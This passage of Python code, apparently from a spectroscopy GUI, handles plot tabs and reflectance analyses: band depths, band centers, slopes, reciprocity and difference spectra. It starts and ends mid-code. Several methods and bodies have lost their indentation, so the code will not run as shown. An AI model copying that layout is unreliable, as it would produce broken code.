        if self.x_axis == "wavelength" and (self.y_axis == "reflectance" or self.y_axis == "normalized reflectance"):
            self.popup_menu.add_command(label="Edit plot", command=self.ask_which_samples)
            self.popup_menu.add_command(label="Plot settings", command=self.open_plot_settings)
            self.popup_menu.add_command(label="Open analysis tools", command=self.open_analysis_tools)
        else:
            self.popup_menu.add_command(label="Plot settings", command=self.open_plot_settings)
        self.save_menu = Menu(self.popup_menu, tearoff=0)
        self.save_menu.add_command(label="White background", command=self.save_white)
        self.save_menu.add_command(label="Dark background", command=self.save_dark)
        self.popup_menu.add_cascade(label="Save plot", menu=self.save_menu)
        self.popup_menu.add_command(label="Export data to .csv", command=self.export)
        self.popup_menu.add_command(label="New tab", command=self.new)
        self.popup_menu.add_command(label="Close tab", command=self.close)
        self.plotter.menus.append(self.popup_menu)
        # Attributes populated later by the analysis tools.
        self.contour_sample = None
        self.incidence_samples = None
        self.emission_samples = None
        self.error_samples = None
        self.base_sample = None
        self.recip_samples = None
        self.sample_options_dict = None
        self.sample_options_list = None
        self.base_spectrum_label = None
        self.existing_indices = None
        self.frozen = False
def freeze(self):
self.frozen = True
def unfreeze(self):
self.frozen = False
    def save_white(self):
        # Swap the white-background canvas in for the dark one, rebind the
        # context-menu mouse handlers to it, then save the white figure.
        self.canvas.get_tk_widget().pack_forget()
        self.white_canvas.get_tk_widget().pack(expand=True, fill=BOTH)
        self.white_canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
        self.white_canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
        self.plot.save(self.white_fig)
def export(self):
path = self.plotter.get_path()
if not path:
return
if path[-4 : len(path)] != ".csv":
path += ".csv"
headers = self.plot.visible_data_headers
data = self.plot.visible_data
headers = (",").join(headers)
# data=np.transpose(data) doesn't work if not all columns are same length
data_lines = []
max_len = 0
for col in data:
if len(col) > max_len:
max_len = len(col)
for col in data:
j = 0
for val in col:
if j < len(data_lines):
data_lines[j] += "," + str(val)
else:
data_lines.append(str(val))
j = j + 1
while j < max_len:
data_lines[j] += ","
j += 1
with open(path, "w+") as f:
f.write(headers + "\n")
for line in data_lines:
f.write(line + "\n")
    def save_dark(self):
        # Swap the dark canvas back in for the white one, rebind the
        # context-menu mouse handlers to it, then save the dark figure.
        self.white_canvas.get_tk_widget().pack_forget()
        self.canvas.get_tk_widget().pack(expand=True, fill=BOTH)
        self.canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
        self.canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
        self.plot.save(self.fig)
def new(self):
self.plotter.new_tab()
    def open_options(self):
        # Delegate to the controller, passing this tab and its title.
        self.plotter.controller.open_options(self, self.notebook_title)
# This is needed so that this can be one of the parts of a dict for buttons:
# self.view_notebook.select:[lambda:tab.get_top()],.
# That way when the top gets recreated in refresh, the reset button will get the new one instead of creating
# errors by getting the old one.
def get_top(self):
return self.top
def set_exclude_artifacts(self, exclude_bool):
    """Toggle exclusion of artifact-prone spectra and redraw the plot.

    Re-applies each sample's hue, strips every plotted data line from both
    the dark and white axes (keeping annotation lines such as the vertical
    markers that show where slopes are calculated), records the new exclude
    flag on the tab and the plot, and redraws both canvases.
    """
    for i, sample in enumerate(self.plot.samples):
        sample.set_colors(self.plot.hues[i % len(self.plot.hues)])
    total = len(self.plot.ax.lines)
    # Remove lines in place; j only advances past annotations we keep.
    j = 0
    for _ in range(total):
        if self.plot.ax.lines[j] not in self.plot.annotations:
            self.plot.ax.lines[j].remove()
        else:
            j += 1
    j = 0
    for _ in range(total):
        if self.plot.white_ax.lines[j] not in self.plot.white_annotations:
            self.plot.white_ax.lines[j].remove()
        else:
            j += 1
    self.exclude_artifacts = exclude_bool
    # Bug fix: this previously assigned the builtin `bool` type instead of
    # the flag value, so the plot's setting never actually changed.
    self.plot.exclude_artifacts = exclude_bool
    self.plot.draw()
    self.canvas.draw()
    self.white_canvas.draw()
def on_visibility(self, event):
    """When tab visibility changes, make sure the context menu is dismissed."""
    self.close_right_click_menu(event)
# find reflectance at a given wavelength.
# if we're on the edges, average out a few values.
@staticmethod
def get_vals(wavelengths, reflectance, nm):
index = (np.abs(wavelengths - nm)).argmin() # find index of wavelength
r = reflectance[index]
w = wavelengths[index]
if (
wavelengths[index] < 600 or wavelengths[index] > 2200
): # If we're on the edges, spectra are noisy. Calculate slopes based on an average.
if 2 < index < len(reflectance):
r = np.mean(reflectance[index - 3 : index + 3])
w = wavelengths[index]
elif index > 2:
r = np.mean(reflectance[-7:-1])
w = wavelengths[-4]
elif index < len(reflectance) - 3:
r = np.mean(reflectance[0:6]) # Take the first 6 values if you are at the beginning
w = wavelengths[3]
return w, r
@staticmethod
def get_index(array, val):
index = (np.abs(array - val)).argmin()
return index
def offset(self, sample_name, offset):
    """Replace the named sample with a deep copy shifted vertically by `offset`.

    `sample_name` may be "title:name" to disambiguate samples sharing a name;
    a bare name matches the first sample with that name regardless of title.
    Only the first match is replaced; the original Sample object is left
    untouched so the tab can be reset later.
    """
    if ":" in sample_name:
        parts = sample_name.split(":")
        title, name = parts[0], parts[1]
    else:
        title, name = None, sample_name
    for idx, current in enumerate(self.samples):
        if current.name != name:
            continue
        if title is not None and current.title != title:
            continue
        replacement = Sample(current.name, current.file, current.title)
        # Copy the spectra so the offset does not mutate the original data.
        replacement.data = {
            geom: {field: list(vals) for field, vals in current.data[geom].items()}
            for geom in current.data
        }
        replacement.geoms = list(current.geoms)
        replacement.add_offset(offset, self.y_axis)
        self.samples[idx] = replacement
        self.refresh(original=self.original_samples, y_axis=self.y_axis)
        break
def calculate_avg_reflectance(self, left, right):
    """Average reflectance between `left` and `right` nm for every geometry.

    Builds three views of the results: per-sample "incidence" samples grouped
    by incidence angle, per-sample "emission" samples grouped by emission
    angle, and one pooled contour sample of (i, e, avg) points. Returns
    (left, right, ["geom: value", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    avgs = []
    self.incidence_samples = []
    self.emission_samples = []
    artifact_warning = False
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "average reflectance": []}}
    self.contour_sample.geoms = []
    for i, sample in enumerate(self.samples):
        incidence_sample = Sample(sample.name, sample.file, sample.title)
        emission_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            # NOTE(review): rebinds the enumerate loop variable i; harmless
            # here because i is not read again before being reassigned.
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, don't calculate reflectance for anything in the range that
                # is considered to be suspect
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True
                    continue
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom][self.y_axis])
            index_left = self.get_index(wavelengths, left)
            index_right = self.get_index(wavelengths, right)
            avg = np.mean(reflectance[index_left:index_right])
            # Partial geometries used as grouping keys for the two views.
            i_geom = (i, None, None)
            e_geom = (None, e, None)
            if i_geom not in incidence_sample.data:
                incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "average reflectance": []}
                incidence_sample.geoms.append(i_geom)
            if e_geom not in emission_sample.data:
                emission_sample.data[e_geom] = {"i": [], "average reflectance": []}
                emission_sample.geoms.append(e_geom)
            incidence_sample.data[i_geom]["e"].append(e)
            incidence_sample.data[i_geom]["az"].append(az)
            incidence_sample.data[i_geom]["theta"].append(e)
            incidence_sample.data[i_geom]["g"].append(g)
            incidence_sample.data[i_geom]["average reflectance"].append(avg)
            emission_sample.data[e_geom]["i"].append(i)
            emission_sample.data[e_geom]["average reflectance"].append(avg)
            self.contour_sample.data["all samples"]["e"].append(e)
            self.contour_sample.data["all samples"]["i"].append(i)
            self.contour_sample.data["all samples"]["average reflectance"].append(avg)
            avgs.append(str(geom) + ": " + str(avg))
        self.emission_samples.append(emission_sample)
        self.incidence_samples.append(incidence_sample)
    self.plot.draw_vertical_lines([left, right])
    return left, right, avgs, artifact_warning
def calculate_band_centers(self, left, right, use_max_for_centers, center_based_on_delta_to_continuum):
    """Locate the absorption-band center between `left` and `right` nm.

    A straight-line continuum is drawn between the spectrum's (edge-smoothed)
    values at the two bounds. The center is the wavelength of the extremum,
    found either in the continuum-removed spectrum
    (center_based_on_delta_to_continuum=True) or in the raw spectrum. When
    use_max_for_centers is set and the peak deviates from the continuum more
    than the trough does, the peak wavelength is reported instead of the
    trough's. Results are grouped into per-incidence, per-emission, and
    pooled contour samples. Returns
    (left, right, ["geom: center", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    centers = []
    self.incidence_samples = []
    self.emission_samples = []
    artifact_warning = False
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "band center": []}}
    self.contour_sample.geoms = []
    for i, sample in enumerate(self.samples):
        incidence_sample = Sample(sample.name, sample.file, sample.title)
        emission_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, don't calculate slopes for anything in the range that is
                # considered to be suspect
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True
                    continue
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom][self.y_axis])
            # find reflectance at left and right wavelengths.
            # if we're on the edges, average out a few values.
            w_left, r_left = self.get_vals(wavelengths, reflectance, left)
            index_left = self.get_index(wavelengths, left)
            w_right, r_right = self.get_vals(wavelengths, reflectance, right)
            index_right = self.get_index(wavelengths, right)
            # Linear continuum between the two band shoulders.
            slope = (r_right - r_left) / (w_right - w_left)
            continuum = reflectance[index_left] + slope * (
                wavelengths[index_left:index_right] - wavelengths[index_left]
            )
            diff = continuum - reflectance[index_left:index_right]
            if center_based_on_delta_to_continuum:
                index_peak = list(diff).index(
                    np.min(diff)
                )  # this is confusing, because we report an absorption band as positive depth, a local maximum
                # in the spectrum occurs at the minimum value of diff.
                index_trough = list(diff).index(np.max(diff))
            else:
                r_trough = np.min(reflectance[index_left:index_right])
                r_peak = np.max(reflectance[index_left:index_right])
                index_trough = list(reflectance[index_left:index_right]).index(r_trough)
                index_peak = list(reflectance[index_left:index_right]).index(r_peak)
            if np.abs(diff[index_peak]) > np.abs(diff[index_trough]) and use_max_for_centers:
                center = wavelengths[index_peak + index_left]
            else:
                center = wavelengths[index_trough + index_left]
            # Partial geometries used as grouping keys for the two views.
            i_geom = (i, None, None)
            e_geom = (None, e, None)
            if i_geom not in incidence_sample.data:
                incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "band center": []}
                incidence_sample.geoms.append(i_geom)
            if e_geom not in emission_sample.data:
                emission_sample.data[e_geom] = {"i": [], "az": [], "band center": []}
                emission_sample.geoms.append(e_geom)
            incidence_sample.data[i_geom]["e"].append(e)
            incidence_sample.data[i_geom]["az"].append(az)
            incidence_sample.data[i_geom]["theta"].append(e)
            incidence_sample.data[i_geom]["g"].append(g)
            incidence_sample.data[i_geom]["band center"].append(center)
            emission_sample.data[e_geom]["i"].append(i)
            emission_sample.data[e_geom]["az"].append(az)
            emission_sample.data[e_geom]["band center"].append(center)
            self.contour_sample.data["all samples"]["e"].append(e)
            self.contour_sample.data["all samples"]["i"].append(i)
            self.contour_sample.data["all samples"]["band center"].append(center)
            centers.append(str(geom) + ": " + str(center))
        self.emission_samples.append(emission_sample)
        self.incidence_samples.append(incidence_sample)
    self.plot.draw_vertical_lines([left, right])
    return left, right, centers, artifact_warning
def calculate_band_depths(self, left, right, report_negative, center_based_on_delta_to_continuum):
    """Compute the continuum-normalized band depth between `left` and `right` nm.

    A linear continuum is drawn between the spectrum's (edge-smoothed) values
    at the two bounds; depth is (continuum - reflectance) / continuum at the
    band extremum. The extremum index comes from the continuum-removed
    spectrum (center_based_on_delta_to_continuum=True) or the raw spectrum.
    With report_negative, a peak that deviates more than the trough is
    reported as a negative depth. Results are grouped into per-incidence,
    per-emission, and pooled contour samples. Returns
    (left, right, ["geom: depth", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    depths = []
    self.incidence_samples = []
    self.emission_samples = []
    artifact_warning = False
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "band depth": []}}
    self.contour_sample.geoms = ["all samples"]
    for i, sample in enumerate(self.samples):
        incidence_sample = Sample(sample.name, sample.file, sample.title)
        emission_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, don't calculate slopes for anything in the range that is
                # considered to be suspect
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True
                    continue
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom][self.y_axis])
            # find reflectance at left and right wavelengths.
            # if we're on the edges, average out a few values.
            w_left, r_left = self.get_vals(wavelengths, reflectance, left)
            index_left = self.get_index(wavelengths, left)
            w_right, r_right = self.get_vals(wavelengths, reflectance, right)
            index_right = self.get_index(wavelengths, right)
            # Linear continuum between the two band shoulders.
            slope = (r_right - r_left) / (w_right - w_left)
            continuum = reflectance[index_left] + slope * (
                wavelengths[index_left:index_right] - wavelengths[index_left]
            )
            diff = (continuum - reflectance[index_left:index_right]) / continuum
            if center_based_on_delta_to_continuum:
                index_peak = list(diff).index(
                    np.min(diff)
                )  # this is confusing, because we report an absorption band as positive depth, a local maximum
                # in the spectrum occurs at the minimum value of diff.
                index_trough = list(diff).index(np.max(diff))
            else:
                r_trough = np.min(reflectance[index_left:index_right])
                r_peak = np.max(reflectance[index_left:index_right])
                index_trough = list(reflectance[index_left:index_right]).index(r_trough)
                index_peak = list(reflectance[index_left:index_right]).index(r_peak)
            if np.abs(diff[index_peak]) > np.abs(diff[index_trough]) and report_negative:
                depth = diff[index_peak]
            else:
                depth = diff[index_trough]
            # Partial geometries used as grouping keys for the two views.
            i_geom = (i, None, None)
            e_geom = (None, e, None)
            if i_geom not in incidence_sample.data:
                incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "band depth": []}
                incidence_sample.geoms.append(i_geom)
            if e_geom not in emission_sample.data:
                emission_sample.data[e_geom] = {"i": [], "az": [], "band depth": []}
                emission_sample.geoms.append(e_geom)
            incidence_sample.data[i_geom]["e"].append(e)
            incidence_sample.data[i_geom]["az"].append(az)
            incidence_sample.data[i_geom]["theta"].append(e)
            incidence_sample.data[i_geom]["g"].append(g)
            incidence_sample.data[i_geom]["band depth"].append(depth)
            emission_sample.data[e_geom]["i"].append(i)
            emission_sample.data[e_geom]["az"].append(az)
            emission_sample.data[e_geom]["band depth"].append(depth)
            self.contour_sample.data["all samples"]["e"].append(e)
            self.contour_sample.data["all samples"]["i"].append(i)
            self.contour_sample.data["all samples"]["band depth"].append(depth)
            depths.append(str(geom) + ": " + str(depth))
        self.emission_samples.append(emission_sample)
        self.incidence_samples.append(incidence_sample)
    self.plot.draw_vertical_lines([left, right])
    return left, right, depths, artifact_warning
@staticmethod
def get_e_i_g(label):
    """Parse incidence, emission, and azimuth out of a label like
    "... (i=30 e=10 az=90)" and return (e, i, g) where g is the phase angle."""
    incidence = float(label.split("i=")[1].split(" ")[0])
    emission = float(label.split("e=")[1].split(" ")[0].strip(")"))
    azimuth = float(label.split("az=")[1].strip(")"))
    return emission, incidence, utils.get_phase_angle(incidence, emission, azimuth)
def calculate_slopes(self, left, right):
    """Spectral slope between `left` and `right` nm for every geometry.

    Slope is (r_right - r_left) / (w_right - w_left), with values near the
    spectrum's edges smoothed by get_vals. Results are grouped into
    per-incidence, per-emission, and pooled contour samples. Returns
    (left, right, ["geom: slope", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    slopes = []
    self.incidence_samples = []
    self.emission_samples = []
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "slope": []}}
    self.contour_sample.geoms = ["all samples"]
    artifact_warning = False
    for i, sample in enumerate(self.samples):
        incidence_sample = Sample(sample.name, sample.file, sample.title)
        emission_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, don't calculate slopes for anything in the range that is
                # considered to be suspect
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True  # We'll return this to the controller, which will throw up a dialog
                    # warning the user that we are skipping some spectra.
                    continue
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(
                sample.data[geom][self.y_axis]
            )  # y_axis is either reflectance or normalized reflectance
            # find reflectance at left and right wavelengths.
            # if we're on the edges, average out a few values.
            w_left, r_left = self.get_vals(wavelengths, reflectance, left)
            w_right, r_right = self.get_vals(wavelengths, reflectance, right)
            slope = (r_right - r_left) / (w_right - w_left)
            # Partial geometries used as grouping keys for the two views.
            i_geom = (i, None, None)
            e_geom = (None, e, None)
            if i_geom not in incidence_sample.data:
                incidence_sample.data[i_geom] = {"e": [], "az": [], "theta": [], "g": [], "slope": []}
                incidence_sample.geoms.append(i_geom)
            if e_geom not in emission_sample.data:
                emission_sample.data[e_geom] = {"i": [], "az": [], "slope": []}
                emission_sample.geoms.append(e_geom)
            incidence_sample.data[i_geom]["e"].append(e)
            incidence_sample.data[i_geom]["az"].append(az)
            incidence_sample.data[i_geom]["theta"].append(e)
            incidence_sample.data[i_geom]["g"].append(g)
            incidence_sample.data[i_geom]["slope"].append(slope)
            emission_sample.data[e_geom]["i"].append(i)
            emission_sample.data[e_geom]["az"].append(az)
            emission_sample.data[e_geom]["slope"].append(slope)
            self.contour_sample.data["all samples"]["e"].append(e)
            self.contour_sample.data["all samples"]["i"].append(i)
            self.contour_sample.data["all samples"]["slope"].append(slope)
            slopes.append(str(geom) + ": " + str(slope))
        self.emission_samples.append(emission_sample)
        self.incidence_samples.append(incidence_sample)
    self.plot.draw_vertical_lines([left, right])
    return left, right, slopes, artifact_warning
def validate_left_right(self, left, right):
    """Coerce `left`/`right` to floats, falling back to the data's own limits.

    If a bound cannot be parsed as a number, it defaults to the extreme
    wavelength (min for left, max for right) across ALL plotted samples and
    geometries. (Bug fix: the old code reset the running extreme at the
    first geometry of each sample, so only the last sample's wavelengths
    were actually considered.)
    """
    try:
        left = float(left)
    except ValueError:
        left = None
        for sample in self.samples:
            for geom in sample.geoms:
                low = np.min(np.array(sample.data[geom]["wavelength"]))
                left = low if left is None else np.min([left, low])
    try:
        right = float(right)
    except ValueError:
        right = None
        for sample in self.samples:
            for geom in sample.geoms:
                high = np.max(np.array(sample.data[geom]["wavelength"]))
                right = high if right is None else np.max([right, high])
    return left, right
def calculate_error(self, left, right, abs_val):
    """Compute difference spectra (delta R) relative to a base sample.

    With multiple samples, the first sample is the base and each later
    sample's spectra are differenced against the base spectrum with the same
    (i, e). With a single sample, its middle spectrum serves as the base.
    `abs_val` takes absolute differences. Populates self.error_samples and
    self.contour_sample, then returns
    (left, right, ["geom: avg difference", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    self.error_samples = []
    artifact_warning = False
    # Bug fix: this accumulator was initialized to False, so the
    # `error == ""` check below never matched and `error += str` would
    # have raised TypeError in the no-corresponding-spectrum branch.
    error = ""
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "difference": []}}
    self.contour_sample.geoms = ["all samples"]
    for i, sample in enumerate(self.samples):
        if i == 0 and len(self.samples) > 1:
            self.base_sample = sample
            continue
        if len(self.samples) == 1:
            # Only one sample: difference everything against its middle spectrum.
            i = int(len(sample.geoms) / 2)
            self.base_spectrum_label = sample.geoms[i]
            self.base_sample = Sample(
                str(self.base_spectrum_label), "file", "title"
            )  # Used for putting the title onto the new plot (delta R compared to sample (i=x, e=y))
        error_sample = Sample(sample.name, sample.file, sample.title)
        self.error_samples.append(error_sample)
        for geom in sample.geoms:
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom][self.y_axis])
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, skip spectra in the suspect range.
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True  # Returned to the controller, which warns the
                    # user that some spectra are being skipped.
                    continue
            index_left = self.get_index(wavelengths, left)
            index_right = self.get_index(wavelengths, right)
            if len(self.samples) == 1:
                error_sample.data[geom] = {}
                error_sample.data[geom]["difference"] = (
                    reflectance - sample.data[self.base_spectrum_label]["reflectance"]
                )
                error_sample.data[geom]["wavelength"] = wavelengths
                error_sample.geoms.append(geom)
                self.contour_sample.data["all samples"]["e"].append(e)
                self.contour_sample.data["all samples"]["i"].append(i)
                if index_left != index_right:
                    difference = (
                        reflectance[index_left:index_right]
                        - sample.data[self.base_spectrum_label]["reflectance"][index_left:index_right]
                    )
                    if abs_val:
                        difference = np.abs(difference)
                    self.contour_sample.data["all samples"]["difference"].append(np.mean(difference))
                else:
                    difference = (
                        reflectance[index_left] - sample.data[self.base_spectrum_label]["reflectance"][index_left]
                    )
                    if abs_val:
                        difference = np.abs(difference)
                    self.contour_sample.data["all samples"]["difference"].append(difference)
            else:
                # Find the base sample's spectrum at the same (i, e) geometry.
                found = False
                for existing_label in self.base_sample.geoms:
                    e_old, i_old, _ = self.plotter.get_e_i_g(existing_label)
                    if e == e_old and i == i_old:
                        error_sample.data[geom] = {}
                        error_sample.data[geom]["difference"] = (
                            reflectance - self.base_sample.data[existing_label]["reflectance"]
                        )
                        error_sample.data[geom]["wavelength"] = wavelengths
                        error_sample.geoms.append(geom)
                        self.contour_sample.data["all samples"]["e"].append(e)
                        self.contour_sample.data["all samples"]["i"].append(i)
                        if index_left != index_right:
                            difference = (
                                reflectance[index_left:index_right]
                                - self.base_sample.data[existing_label]["reflectance"][index_left:index_right]
                            )
                            if abs_val:
                                difference = np.abs(difference)
                            self.contour_sample.data["all samples"]["difference"].append(np.mean(difference))
                        else:
                            difference = (
                                reflectance[index_left]
                                - self.base_sample.data[existing_label]["reflectance"][index_left]
                            )
                            if abs_val:
                                difference = np.abs(difference)
                            self.contour_sample.data["all samples"]["difference"].append(difference)
                        found = True
                        break
                if not found:
                    # No matching base geometry: record the raw spectrum and
                    # accumulate a message listing the unmatched geometries.
                    if error == "":
                        error = "Error: No corresponding spectrum found.\n"
                    error += "\n" + str(geom)
                    error_sample.data[geom] = {}
                    error_sample.data[geom]["difference"] = reflectance
                    error_sample.data[geom]["wavelength"] = wavelengths
                    error_sample.geoms.append(geom)
                    self.contour_sample.data["all samples"]["e"].append(e)
                    self.contour_sample.data["all samples"]["i"].append(i)
                    self.contour_sample.data["all samples"]["difference"].append(np.mean(reflectance))
    if error:
        print(error)
    avg_errs = []
    for sample in self.error_samples:
        for geom in sample.geoms:
            wavelengths = np.array(sample.data[geom]["wavelength"])
            index_left = self.get_index(wavelengths, left)
            index_right = self.get_index(wavelengths, right)
            if index_right != index_left:
                if abs_val:
                    avg = np.mean(np.abs(sample.data[geom]["difference"][index_left:index_right]))
                else:
                    avg = np.mean(sample.data[geom]["difference"][index_left:index_right])
            else:
                avg = sample.data[geom]["difference"][index_right]
            avg_errs.append(str(geom) + ": " + str(avg))
    self.plot.draw_vertical_lines([left, right])
    return left, right, avg_errs, artifact_warning
def calculate_reciprocity(self, left, right):
    """Check reciprocity: pair each geometry (i, e) with its reciprocal (-e, -i).

    For each geometry, the average reflectance over [left, right] is grouped
    under one shared key with its reciprocal geometry; once both members of a
    pair are present, the normalized spread |max - min| / mean is reported.
    Also fills self.contour_sample with the per-pair delta R values (mirrored
    at the reciprocal geometry). Returns
    (left, right, ["geom: delta", ...], artifact_warning).
    """
    left, right = self.validate_left_right(left, right)
    avgs = []
    # For each recip_sample.data[label] there will be up to two points, which
    # should be reciprocal measurements of each other. E.g.
    # recip_sample.data['White reference (i=-20,e=20)'] holds data for both
    # i=-30,e=-10 and i=10,e=30.
    self.recip_samples = []
    artifact_warning = False
    self.contour_sample = Sample("all samples", "file", "title")
    self.contour_sample.data = {"all samples": {"i": [], "e": [], "delta R": []}}
    self.contour_sample.geoms = ["all samples"]
    for sample in self.samples:
        recip_sample = Sample(sample.name, sample.file, sample.title)
        for geom in sample.geoms:
            i, e, az = utils.get_i_e_az(geom)
            g = utils.get_phase_angle(i, e, az)
            if (
                self.exclude_artifacts
            ):  # If we are excluding artifacts, skip spectra in the suspect range.
                if self.plotter.artifact_danger(g, left, right):
                    artifact_warning = True  # Returned to the controller, which warns the
                    # user that some spectra are being skipped.
                    continue
            wavelengths = np.array(sample.data[geom]["wavelength"])
            reflectance = np.array(sample.data[geom][self.y_axis])
            index_left = self.get_index(wavelengths, left)
            index_right = self.get_index(wavelengths, right)
            if index_right != index_left:
                avg = np.mean(reflectance[index_left:index_right])
            else:
                avg = reflectance[index_left]
            recip_label = sample.name + " (i=" + str(-1 * e) + " e=" + str(-1 * i) + ")"
            if geom not in recip_sample.data and recip_label not in recip_sample.data:
                recip_sample.data[geom] = {"e": [], "g": [], "i": [], "average reflectance": []}
                recip_sample.geoms.append(geom)
            # Append this measurement under whichever key (the geometry itself
            # or its reciprocal's label) already exists.
            key = geom if geom in recip_sample.data else recip_label
            entry = recip_sample.data[key]
            entry["e"].append(e)
            entry["i"].append(i)
            entry["g"].append(g)
            entry["average reflectance"].append(avg)
            if len(entry["average reflectance"]) > 1:
                # Min/max also copes with duplicate measurements at one
                # geometry: it just takes the extremes.
                diff = np.abs(np.max(entry["average reflectance"]) - np.min(entry["average reflectance"]))
                # Bug fix: the normalized spread was previously computed only
                # in the recip_label branch but appended in both, which could
                # raise NameError or reuse a stale value from an earlier geometry.
                recip = diff / np.mean(entry["average reflectance"])
                avgs.append(str(geom) + ": " + str(recip))
        self.recip_samples.append(recip_sample)
    for sample in self.recip_samples:
        for geom in sample.data:
            if len(sample.data[geom]["average reflectance"]) > 1:
                i, e, az = utils.get_i_e_az(geom)
                g = utils.get_phase_angle(i, e, az)
                diff = np.abs(
                    np.max(sample.data[geom]["average reflectance"])
                    - np.min(sample.data[geom]["average reflectance"])
                )
                recip = diff / np.mean(sample.data[geom]["average reflectance"])
                self.contour_sample.data["all samples"]["e"].append(e)
                self.contour_sample.data["all samples"]["i"].append(i)
                self.contour_sample.data["all samples"]["delta R"].append(recip)
                # Mirror the point at the reciprocal geometry.
                self.contour_sample.data["all samples"]["e"].append(-1 * i)
                self.contour_sample.data["all samples"]["i"].append(-1 * e)
                self.contour_sample.data["all samples"]["delta R"].append(recip)
    self.plot.draw_vertical_lines([left, right])
    return left, right, avgs, artifact_warning
def plot_error(self, x_axis):
    """Open a tab plotting the difference-from-base (delta R) results.

    x_axis "e,i" gives a contour plot, "az, e" gives hemisphere plots
    (no Tab is created), anything else plots difference vs wavelength.
    Returns the new Tab, or None for hemisphere plots.
    """
    tab = None  # Bug fix: `tab` was unbound when x_axis == "az, e", so the
    # return statement raised UnboundLocalError.
    if x_axis == "e,i":
        x_axis = "contour"
        tab = Tab(
            self.plotter,
            "\u0394" + "R compared to " + self.base_sample.name,
            [self.contour_sample],
            x_axis="contour",
            y_axis="difference",
        )
    elif x_axis == "az, e":
        self.plot_hemisphere_plots("difference", "Difference")
    else:
        tab = Tab(
            self.plotter,
            "\u0394" + "R compared to " + self.base_sample.name,
            self.error_samples,
            x_axis="wavelength",
            y_axis="difference",
        )
    return tab
def plot_reciprocity(self, x_axis):
    """Open a tab plotting reciprocity results; contour plot when x_axis is "e,i"."""
    if x_axis == "e,i":
        return Tab(self.plotter, "Reciprocity", [self.contour_sample], x_axis="contour", y_axis="delta R")
    return Tab(self.plotter, "Reciprocity", self.recip_samples, x_axis=x_axis, y_axis="average reflectance")
def plot_avg_reflectance(self, x_axis):
    """Open a tab plotting average reflectance against the chosen x axis."""
    if x_axis == "e,i":
        tab = Tab(
            self.plotter, "Reflectance", [self.contour_sample], x_axis="contour", y_axis="average reflectance"
        )
        # For whatever reason, x and y labels don't show up unless these
        # canvas update calls are made.
        tab.plot.fig.canvas.draw()
        tab.plot.white_fig.canvas.draw()
    elif x_axis == "az, e":
        self.plot_hemisphere_plots("average reflectance", "Reflectance")
    elif x_axis in ("e", "theta", "g", "i"):
        # "i" plots come from the emission view; the rest from the incidence view.
        source = self.emission_samples if x_axis == "i" else self.incidence_samples
        Tab(
            self.plotter,
            "Reflectance vs " + x_axis,
            source,
            x_axis=x_axis,
            y_axis="average reflectance",
        )
def plot_hemisphere_plots(self, key, data_label):
    """Draw one hemisphere plot per incidence angle per sample.

    `key` selects which per-geometry value to plot (e.g. "slope",
    "band depth"); `data_label` is the human-readable label for the plot.
    Incidence angles with 7 or fewer datapoints are skipped with a log
    message instead of being plotted.
    """
    for incidence_sample in self.incidence_samples:
        for i_geom in incidence_sample.data:
            incidence = i_geom[0]
            sample_name = incidence_sample.name
            geoms = []
            data = []
            # Rebuild full (i, e, az) geometries for this incidence angle.
            for j, emission in enumerate(incidence_sample.data[i_geom]["e"]):
                azimuth = incidence_sample.data[i_geom]["az"][j]
                geoms.append((incidence, emission, azimuth))
                data.append(incidence_sample.data[i_geom][key][j])
            if len(data) > 7:
                try:
                    self.hemisphere_plotter.plot(geoms, data, incidence, sample_name, data_label)
                except Exception as e:
                    # Log context before re-raising so failures are visible.
                    print("Failed to create hemisphere plot")
                    raise e
            else:
                self.plotter.controller.log(
